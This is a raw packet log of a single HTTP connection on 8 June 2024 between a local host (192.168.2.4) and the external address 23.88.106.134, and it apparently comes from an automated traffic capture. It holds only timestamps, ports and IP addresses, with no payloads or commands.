Jun 8, 2024 20:22:01.242813110 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.242846966 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.242846966 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.242846966 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.242877960 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.243845940 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.243879080 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.243913889 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.243946075 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.243978977 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.244159937 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.244159937 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.244453907 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.244527102 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.244563103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.244596004 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.244616032 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.244632959 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.244699955 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.244699955 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.244736910 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.246196032 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.246229887 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.246267080 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.246289968 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.246299028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.246313095 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.246336937 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.246356010 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.246367931 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.246408939 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.246717930 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.246752977 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.246788979 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.246820927 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.246855974 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.246906996 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.246954918 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.248116970 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.248151064 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.248187065 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.248198986 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.248224020 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.248224974 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.248241901 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.248264074 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.248286009 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.248328924 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.251775980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.251828909 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.251858950 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.251894951 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.255156994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.255191088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.255225897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.255260944 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.255280972 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.255297899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.255373001 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.255373001 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.255373001 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.255418062 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.255459070 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.255495071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.255528927 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.255589962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.255649090 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.255650043 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.255650043 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.255650043 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.255729914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.255750895 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.255819082 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.368818998 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.368844986 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.368860960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.368900061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.368917942 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.368935108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.368951082 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.368968964 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.368983030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.368988991 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.369075060 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.369075060 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.369225025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.369261026 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.369297028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.369330883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.369385958 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.369416952 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.369417906 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.369438887 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.369455099 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.369460106 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.369494915 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.369498014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.369509935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.369538069 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.369566917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.369568110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.369602919 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.369606972 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.369637012 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.369640112 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.369661093 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.369709015 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.370331049 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.370366096 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.370404005 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.370512009 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.370518923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.370554924 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.370587111 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.370603085 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.370625973 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.370650053 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.370665073 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.370687962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.370714903 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.370748997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.371031046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.371073961 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.371104956 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.371108055 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.371126890 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.371143103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.371159077 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.371180058 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.371197939 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.371216059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.371237993 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.371256113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.371267080 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.371292114 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.371316910 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.371344090 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372037888 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372071028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372104883 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372107029 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372137070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372143030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372157097 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372179031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372195959 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372214079 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372235060 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372250080 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372266054 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372287989 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372301102 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372324944 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372342110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372375011 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372384071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372438908 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372442961 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372507095 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372518063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372553110 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372587919 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372587919 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372616053 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372623920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372639894 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372659922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372683048 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372694969 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372715950 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372729063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372740984 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372767925 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372795105 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372802973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372822046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372838020 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372864008 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372872114 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372895956 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372908115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372941017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372965097 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.372977018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.372997999 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.373033047 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.380609989 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.380626917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.380644083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.380660057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.380707026 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.380750895 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.380948067 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.380964994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.380981922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.380999088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381014109 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.381017923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381036043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381052971 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.381077051 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.381159067 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381175995 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381192923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381210089 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381217003 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.381248951 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.381283998 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.381552935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381567955 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381583929 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381598949 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381614923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381614923 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.381629944 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381633997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.381650925 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381666899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381679058 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.381683111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381700039 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381700993 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.381728888 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381738901 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.381768942 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.381772041 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381789923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381805897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381807089 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.381824970 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381828070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.381843090 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381854057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.381860971 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381877899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381892920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381896973 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.381908894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381913900 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.381927967 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381942987 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381958008 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.381962061 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.381980896 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.382023096 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.493568897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493607998 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493633986 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493650913 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493668079 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493684053 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493700027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493706942 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493721962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493732929 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.493737936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493766069 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493782043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493793964 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.493799925 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493817091 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493832111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493849039 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493865013 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493865013 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.493881941 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493891001 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.493900061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493913889 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.493922949 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493937016 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.493938923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493957043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.493978024 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.494014025 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.494265079 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.494283915 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.494328022 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.494355917 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.494487047 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.494502068 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.494518995 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.494534016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.494545937 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.494551897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.494584084 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.494601011 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.494615078 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.494622946 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.494632006 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.494658947 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.494683981 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.494685888 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.494705915 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.494740963 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.494770050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.495043993 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.495062113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.495105028 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.495130062 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.495337963 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.495354891 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.495371103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.495399952 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.495424032 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.495482922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.495500088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.495516062 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.495532990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.495547056 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.495552063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.495568037 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.495573997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.495608091 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.495632887 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.495882988 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.495944977 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.496006012 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.496021986 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.496037960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.496053934 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.496066093 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.496092081 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.496126890 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.496189117 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.496248007 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.496428967 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.496445894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.496511936 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.496511936 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.496630907 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.496648073 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.496664047 CEST	80	49731	23.88.106.134	192.168.2.4
